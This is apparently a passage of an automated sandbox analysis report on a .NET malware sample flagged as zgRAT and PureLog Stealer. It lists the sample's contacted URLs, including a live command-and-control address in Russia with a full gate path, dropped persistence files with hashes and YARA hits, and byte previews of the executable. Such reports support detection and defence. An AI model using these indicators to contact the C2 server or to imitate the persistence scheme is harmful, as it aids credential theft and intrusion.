                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoservices.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                        		high
                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchservices.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                            		high
                                            http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlonservices.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                                		high
                                                http://89.23.96.180services.exe, 00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.000000000358C000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000035C3000.00000004.00000800.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://www.ecosia.org/newtab/services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXNPOazHpXF.exe, 00000000.00000002.2113796055.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, XNPOazHpXF.exe, 00000000.00000002.2113796055.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=services.exe, 00000007.00000002.3323064532.0000000014335000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000013A1D000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014A24000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000142DD000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.0000000014371000.00000004.00000800.00020000.00000000.sdmp, services.exe, 00000007.00000002.3323064532.00000000132EE000.00000004.00000800.00020000.00000000.sdmp, fC7n25oOth.7.dr, HslgI8GFKy.7.dr, 7lGrZZTg6P.7.dr, YKVdl3qRW3.7.dr, qrCXgKFeXX.7.dr, Me1sywPqWl.7.dr, zYDXjqUiwz.7.dr, 9pJalsOZnX.7.dr, C5HACCzIP7.7.dr, Aad1KyMxEJ.7.dr, FcHVbMX2xg.7.dr, q3ruztWTol.7.dr, pkOvVXzdYG.7.dr, iW5lf7oEU7.7.dr, dSWTN6jEWv.7.drfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        89.23.96.180
                                                        		unknownRussian Federation
                                                        		48687MAXITEL-ASRUtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1579268
                                                        Start date and time:2024-12-21 10:46:12 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 21s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:11
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:XNPOazHpXF.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:ADAE028E0A5A72D219A02BB06D92241A.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@10/328@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63, 23.218.208.109
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        04:47:25API Interceptor849262x Sleep call for process: services.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        89.23.96.1809FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MAXITEL-ASRU9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 89.23.96.180
                                                        bPkG0wTVon.exeGet hashmaliciousUnknownBrowse
                                                        • 89.23.100.233
                                                        itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                        • 89.23.100.233
                                                        3gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                                        • 89.23.100.233
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                        • 89.23.100.42
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                        • 89.23.100.42
                                                        7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                                        • 89.23.100.233
                                                        iGxCM2I5u9.exeGet hashmaliciousFlesh StealerBrowse
                                                        • 89.23.100.233
                                                        T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                                        • 89.23.100.233
                                                        3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                                        • 89.23.100.233

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            C:\Recovery\conhost.exe9FwQYJSj4N.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                              Created / dropped Files

                                                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\6e29dc590045bf

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (747), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):747
                                                              Entropy (8bit):5.897136999214371
                                                              Encrypted:false
                                                              SSDEEP:12:K1AHg/DkmFNJqxqnxQdDFjUEuJex6qTm2EyA1i/RHsI5RGU/PN6FOgO3g/lA9/we:+AAL5FNI8nxQdpmJepnEyx1RG5Y3g/+r
                                                              MD5:85A88B184F687D664F117E4F438B443C
                                                              SHA1:BC6EF07CE092B39663E01D63929E4BF97176C49E
                                                              SHA-256:2A5ABEC60081C8B8C04EBB911F94010E9764EE73E26A58A5F41752AF9B2F7820
                                                              SHA-512:BA6098DB07E72522B8964B4428FCE4C0C929D7DE569B46CF410B357A98D781159F8FBEE67E522DBA1573A2140AF7A2D078D89B6DF81A05C75CDB7CFDA650F1A1
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:KzwY8blmgaR9iKA8VcFWf4uxozcknGrg2vGIGiasawjOYL0JxPQAMVOPE8uJ8A8ZsvGxD22wCW6sVgZc9SxY0rThg0DHyQuaxJgnFCG5Wd80Zg4ijRKpNkjAbjRNyv7vmg4L9vX6M1BWtdHA5fhhGEMNkfMfv2GlgMN2lsiy4NcViMR7bQRTOaphTrlej1KUua0gPOYM6sm3l1oXOOEflwWGgpj4HEPDCIkIWurM1EXfxw6cCNPUwpt8Du9kpeF2dj0cQfBdg1ngZ0SutG14y4QWZmFmuHgW9fCO6dLgLwy4CMiMbP0inKDjSdDoaZsYVQg4yDyP5UsBFWUMD2KfR8tybd6cahGwEZjwqoYYaknSbCd6I0khOMHXgsdVHVzXO67qwigZewFqUaWZAATj7ih1SMP7KDQEvQDfExJkUKDcHbCFVEVGBQZqZGXkSiPbfA4DX1UM0tPxeFt0JJmGsKCe1XG7ZjRv5m6Hg9sdtIQSBmLTWhaJ6IsV7aM9vXxRbd22JmUKaIXj3udPLwk2JIzw3kJGwssWU90itSKuMPsxvJbN67y8w4HTnF9idOXraBO435f3m0p3ZCBuI5Jz4tjZ1h4oTlQ82AWu4gUBc5V5PO4lDPZhEixrbyDVB0jBjqBYqR0mkIX9XoKmnSkELt4TNpSFc8AlVUWiNf5wZx66LxTxobssPf00wrKB8uJmHvoDSmZHXyoXw7IaVfaBQSVzefvfV4yooUyZJQfCBlU

                                                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

                                                              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................j;...........;.. ....;...@.. ........................;...........@...................................;.K.....;.p.....................;...................................................... ............... ..H............text...4i;.. ...j;................. ..`.rsrc...p.....;......l;.............@....reloc........;......p;.............@..B..................;.....H.......4..........p.......7.0.\.;......................................0..........(.... ........8........E........9...*...)...8....(.... ....~....{....:....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........u...........P.......8....~....(G... .... .... ....s....~....(K....... ....~....{....:....& ....8.......... ....~....{e...9y...& ....8n.......~....(O...~....(S... ....<.... ....~....{e...98...& ....8-...r...ps....z*8..

                                                              C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exe:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\ProgramData\e8d1d6a80bfe6b

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (652), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):5.890466774539286
                                                              Encrypted:false
                                                              SSDEEP:12:5ZdUeyXKm7UqASO+6mCrhjWB5SwCW1pztIHmrTFJso/OTfmXkZjZAhgH:5TUVKQA9+6DUB5SwzlTFjWm+jZAha
                                                              MD5:2DBA4C12EE43C990B57153EBC895CDCA
                                                              SHA1:10231FDA3BA797B1E1CF9C7AA172FDDDA855AF6C
                                                              SHA-256:2E363BDA929F51ED3B197E0FDA8758396B22CDB99681F121683D5C8C47E409BE
                                                              SHA-512:86BC22336928F2ABDF0F4FDEA4AB8512507A7BB90ECF190542EDB819B9AF3EBD75836FBEAA402DBF19C3E6CBAB9CA4F52C024900F1D9E8953737915BF2E696E4
                                                              Malicious:false
                                                              Preview:Ng6eC1x2m7BfnH3hjYK19I0Pn19kH1bNXnvtQu1zW50wzdGWMvyYAdoEpr1K1MuvgyHAWJQyhUfESEZJvnYVCDM38qDj3q7JKFPAVGACfA0p8kwlRrZOxYsclOBpFr51WV4MyZypmV0CMh4Y4cRLQtVvXxZHEV7xF9Snqjx23ulbipPDTnunZtkn9IzB9qkQYC7NORrVoZSgH4MrhVxblTYVYpnhuw2MKVCfsCyB5Z8AaEfF6Ido3IpFolzjoJk2gFWw1r8egvfMVX5UJhlmSOTBp71GNPXwyGeVstOOJ9HHnduQqeZGi8jRvVG3z1RQYtXO3jlaTWdTGMXMNkaszRO0gMjXmVZRr1s4FfXG38xLfQLj73pPbjbHfhrrAOx77LlPddHsNUz0eCVQA9ZtqJ0IZlYhypFoLzNTo6Gev6BGtkmcMaqByERxUdz1Ej4hOKpozBmE357tItYz86VX9EzHiZ8KGOZMCd1j48mKymH3GhplE92INgiKViGZDb7pgvqo1z5ATLjX66BAuXGHVR8f5rOW2NHWocXU1BtOE2yC7LNYhFppV0TOxKsKliIGENsejrJso1Cdd6iuezzwhbAxIIgqSjnfts7ucsz066Bex0v1m8qwtVimM5WaKdaENhtu8yRv990k

                                                              C:\Recovery\088424020bedd6

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (569), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):569
                                                              Entropy (8bit):5.885752845584327
                                                              Encrypted:false
                                                              SSDEEP:12:ApPywB0Ymw4cZGb6Apu+WCsagXjwLnrR83ZbbgC0venBk:aywS5w4c4fprWCs5jwLnrR83ZbFy
                                                              MD5:AD10BFFBE6CB75B8A438D441265C7699
                                                              SHA1:90E76CC7BE4CCB1D5FF8FBFD4E35DD983D4A746B
                                                              SHA-256:8662A30941DE4CF1BC89C115FD99D29017A854849B3DECC88450E24C9C471231
                                                              SHA-512:B156D3B01AE30F3E51956F5B9F1850ECAECE71FB2B064C1A582E0921BB5E4F3FD425FB7A602FE08BFA0BFC60273DAAFD567CA08BAC5D06991587B2981D786F9A
                                                              Malicious:false
                                                              Preview:upcUHVzayjw03vdAAsbIsRFAY9o738Bb56lOVUh899UrsLIz0b0tnq0ckb5Hq2g0hV46KOoqLcJt7YSN1zGcIRyPGIo3YZSHddJXQLplwJhKhGfLJrP1vDrQhp0CkvSwKCQdP57qKep8tnr9mdtqJaVZw3zkVmBB1vAf0C6OujrQXsg480aHBlntq0rWFWVhdoH8mMIjgf5jsFBDW5meM49QIQyAVkIYOJwtlhRvr0kgpDBlyo9Jt0Vjp10WXIO6WgUjSSbzo0wWTckEPNLrl8pYyNDur4XimoKIsbSgMJf2D8PMQvGK7gUX16uFPqItdOuoSbWx5pebdwUz71d5xNlFTwQvrNRfBvZzOl4yZTORC24Fl4HXMN5PmoUfKkFrY8arWflW6pfe8TCb2LKxF3SyzKMjQYnzNg3DcMsGTvbhrbQSl3m9aSmfpm1MSBFiBqQba98qcDeUcvGY337WvoZ44YX0VfxRp2gBKy2m56hWyRD4fdTYDtxXQVgBmIV6QMpjOENEBVbyGDGnVcU2MZN5FJvzR0AxlkGlldpbPOXsR8QNP3qJxcu08

                                                              C:\Recovery\5940a34987c991

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with very long lines (708), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):708
                                                              Entropy (8bit):5.895249866582535
                                                              Encrypted:false
                                                              SSDEEP:12:zH7A4r/Sfe+e4YdR5OaX0dFxK0xv+2cBV0BfEQ7TFOsKs2g8wQqJ:PrKm+05OT0QWHmBmO5J
                                                              MD5:E2CDF12153CE0707C1A22ECEBAC471AD
                                                              SHA1:4E300AA7833A47D38DB916538850F4F6D20F27EF
                                                              SHA-256:DAF1EFBF4538603DA51AFD17C1D005EC40EA36C3F061C68E5676AAFED4AC2183
                                                              SHA-512:C6393A314A5828316E38AC3FF742F82C43C07180D2F32264222A7992B83AA5C608B28E4793F0F3FBF6CFCAB676885D7CEBE4B532489707D2D6BBBF23E67F6DB1
                                                              Malicious:false
                                                              Preview:Ak6zpTJZ0QMrQuZXJCS4rvGwUCPhDZIwY3l9TbxclxaYbxkg4EUc7rAPdJfnElWbIZTXJaDrOzS3UrUhctn9Fqyr2WfJ6KY9b9QBeMWeAmNHYG4wy8LV7XWcklfw43uDbTcVbTCPWJ8ccrSwctV89DCDnya2rkjH2KqFojVf568yY393TtUKiwEXRYrm2Jhvj1kRAMH3YzDDEOptygj8QZiGGSyP1smvYMOhTr2GlbvssBTCt8yVkjfKSeLsY1BqNRo19HaGocXyn0XE9vg33QLzqDPygKstZFfbWbDlhrrHLrgcHGtmVIw6GzK52lkeuoZiU5shs4VMiDn9hwrZaFXQSiVgQHt5HNXhR7HLYL4axkXCMKYF4LDoQJQwjLRkLZFVpFsjpfAPL6drKSUFtnB5KsRIrVmM4TPXfCXHcyZYKydTpjlR1L1hXJL6xk2U3xV2qFMI5Mm4OmvWP7cHuUVsbsAW1aT25FfWdlmkXcWoi7SuYzq0Hukicma8FzRe3u8IHY2oV1uR8rJeZP7BudvKf640KofhL2vy8Kn96CfPASjvc6iz1Pta9ynKdCeqWNGG5VfPm8Fs8fKNWJXNFpp5IUyKgcf3hy3wLdzHbTN3JBbdnaxUpQlqiL8kgVsJcLKJmYB3UPwwcvvG3VgGoLORNMOAeOlFkDb71R1PY4AZezOwZ2rLylfR726ZKBYFoqLY

                                                              C:\Recovery\conhost.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
